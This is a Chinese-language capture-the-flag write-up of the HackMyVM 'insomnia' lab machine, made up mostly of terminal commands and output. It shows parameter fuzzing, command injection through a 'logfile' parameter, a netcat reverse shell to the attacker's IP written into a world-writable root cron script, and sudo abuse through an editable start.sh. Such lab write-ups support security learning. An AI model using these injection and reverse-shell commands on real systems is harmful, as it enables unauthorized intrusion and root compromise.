HMV-insomnia靶机复盘

端口扫描

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.112.252
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-16 20:12 CST
Nmap scan report for bogon (192.168.112.252)
Host is up (0.0014s latency).
Not shown: 999 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
8080/tcp open  http    PHP cli server 5.5 or later (PHP 7.3.19-1)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Chat
MAC Address: D2:24:EE:B5:C6:9D (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   1.36 ms bogon (192.168.112.252)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.19 seconds

只开放8080端口是一个http服务，去web上面看看

web探测

给了一个输入框

然后目录扫描一下

┌──(root㉿kakeru)-[~/tmp]
└─# dirsearch -u 192.168.112.252:8080 -e php,jpg,html,js,txt,bak -i 200,300-399
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jpg, html, js, txt, bak | HTTP method: GET | Threads: 25
Wordlist size: 11988

Output File: /root/tmp/reports/_192.168.112.252_8080/_25-02-16_20-21-37.txt

Target: http://192.168.112.252:8080/

[20:21:37] Starting: 
[20:21:48] 200 -   65B  - /administration.php
[20:21:53] 200 -    2KB - /chat.js
[20:21:53] 200 -    3B  - /chat.txt
[20:22:13] 200 -   20B  - /start.sh

Task Completed

┌──(root㉿kakeru)-[~/tmp]
└─# curl http://192.168.112.252:8080//administration.php
You are not allowed to view : <br>Your activity has been logged
┌──(root㉿kakeru)-[~/tmp]
└─# curl http://192.168.112.252:8080/start.sh
php -S 0.0.0.0:8080
                                                                           
┌──(root㉿kakeru)-[~/tmp]
└─# curl http://192.168.112.252:8080/chat.txt   



                                      

没有什么多余信息了，然后的思路是对这个administration.php进行参数爆破，因为这个是个php文件，可能存在后门

┌──(root㉿kakeru)-[~/tmp]
└─# wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 192.168.112.252:8080//administration.php?FUZZ=id --hh 65
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.112.252:8080//administration.php?FUZZ=id
Total requests: 4744

=====================================================================
ID           Response   Lines    Word       Chars       Payload   
=====================================================================

000002522:   200        2 L      12 W       67 Ch       "logfile" 

找到参数logfile 去网站里面试试

发现没有回显，用ping本机，然后用tcpdump看看验证是否可以成功执行命令

?logfile=id;ping -c2 192.168.112.11

┌──(root㉿kakeru)-[~/tmp]
└─# tcpdump  -A -n icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
20:34:03.429775 IP 192.168.112.252 > 192.168.112.11: ICMP echo request, id 6058, seq 15, length 64
E..T..@.@..9..p...p.........;..g............................ !"#$%&'()*+,-./01234567
20:34:03.429824 IP 192.168.112.11 > 192.168.112.252: ICMP echo reply, id 6058, seq 15, length 64
E..To^..@.....p...p.........;..g............................ !"#$%&'()*+,-./01234567
20:34:04.437600 IP 192.168.112.252 > 192.168.112.11: ICMP echo request, id 6058, seq 16, length 64
E..T..@.@..b..p...p.........<..g............................ !"#$%&'()*+,-./01234567

反弹shell

┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234          
id
id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
script -qc /bin/bash /dev/null
www-data@insomnia:~/html$ ^Z
zsh: suspended  nc -lp 1234
                                                                           
┌──(root㉿kakeru)-[~/tmp]
└─# cat bbb                                  
stty raw -echo; fg
                                                                           
┌──(root㉿kakeru)-[~/tmp]
└─# stty raw -echo; fg
[1]  + continued  nc -lp 1234
                             reset
reset: unknown terminal type unknown
Terminal type? xterm

提权

www-data@insomnia:~/html$ sudo -l
Matching Defaults entries for www-data on insomnia:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on insomnia:
    (julia) NOPASSWD: /bin/bash /var/www/html/start.sh

www-data@insomnia:~/html$ cat /var/www/html/start.sh
php -S 0.0.0.0:8080

这个start.sh竟然有写入权限，这个是个sh脚本，那我们直接在脚本里面写/bin/bash

www-data@insomnia:~/html$ ls -al
total 40
drwxr-xr-x 3 www-data www-data 4096 Feb 16 07:14 .
drwxr-xr-x 3 root     root     4096 Dec 17  2020 ..
-rw-r--r-- 1 www-data www-data  426 Dec 21  2020 administration.php
-rw-r--r-- 1 www-data www-data 1610 Dec 20  2020 chat.js
-rw-r--r-- 1 www-data www-data 4096 Feb 16 07:39 chat.txt
drwxr-xr-x 2 www-data www-data 4096 Dec 20  2020 images
-rw-r--r-- 1 www-data www-data 2899 Dec 21  2020 index.php
-rw-r--r-- 1 www-data www-data 1684 Dec 20  2020 process.php
-rwxrwxrwx 1 root     root       20 Dec 21  2020 start.sh
-rw-r--r-- 1 www-data www-data 1363 Dec 20  2020 style.css

www-data@insomnia:~/html$ echo "/bin/bash" >> /var/www/html/start.sh

www-data@insomnia:~/html$ sudo -u julia /bin/bash /var/www/html/start.sh
[Sun Feb 16 07:57:36 2025] Failed to listen on 0.0.0.0:8080 (reason: Address already in use)
julia@insomnia:/var/www/html$ id
uid=1000(julia) gid=1000(julia) groups=1000(julia),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)

成功拿到用户的shell

 julia@insomnia:/var/www/html$ find / -user root -perm -4000 -print 2>/de<ml$ find / -user root -perm -4000 -print 2>/dev                        /null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/passwd
/usr/bin/su
/usr/bin/umount
/usr/bin/newgrp

suid没东西再从本地上传pspy64 看看有没有定时任务

julia@insomnia:~$ wget 192.168.112.11/pspy64
--2025-02-16 08:00:40--  http://192.168.112.11/pspy64
Connecting to 192.168.112.11:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64             100%[===============>]   2.96M  --.-KB/s    in 0.09s   

2025-02-16 08:00:40 (34.1 MB/s) - ‘pspy64’ saved [3104768/3104768]

julia@insomnia:~$ chmod =x    ^C
julia@insomnia:~$ chmoc ^C
julia@insomnia:~$ chmod +x pspy64
julia@insomnia:~$ ./pspy64

2025/02/16 08:00:58 CMD: UID=0     PID=2      | 
2025/02/16 08:00:58 CMD: UID=0     PID=1      | /sbin/init 
2025/02/16 08:01:01 CMD: UID=0     PID=766    | /usr/sbin/CRON -f 
2025/02/16 08:01:01 CMD: UID=0     PID=767    | /usr/sbin/CRON -f 
2025/02/16 08:01:01 CMD: UID=0     PID=768    | /bin/sh -c    /bin/bash /var/cron/check.sh 
2025/02/16 08:01:01 CMD: UID=0     PID=769    | /bin/bash /var/cron/check.sh 

发现root真的会执行一个定时任务

julia@insomnia:~$ cat /var/cron/check.sh
#!/bin/bash
status=$(systemctl is-active insomnia.service)
if [ "$status" == "active"  ]; then
   echo "OK"
else
   systemctl start  insomnia.service
fi

这个文件也有权限

julia@insomnia:/var/cron$ ls -al
total 12
drwxr-xr-x  2 root root 4096 Dec 21  2020 .
drwxr-xr-x 13 root root 4096 Dec 21  2020 ..
-rwxrwxrwx  1 root root  153 Dec 21  2020 check.sh

和刚才用户一样的思路，直接写反弹shell让root执行拿到root的shell

julia@insomnia:/var/cron$ echo "nc -e 192.168.112.11 1234 /bin/bash" > check.sh

┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234
id
uid=0(root) gid=0(root) groups=0(root)

总结

又学习了目录扫描时候的一些操作，比如加上后缀，接受特定的状态码，然后是php的参数注入，加强wfuzz这个工具的利用
后面提权的部分还是很简单的，都是可以写入的文件，还是root的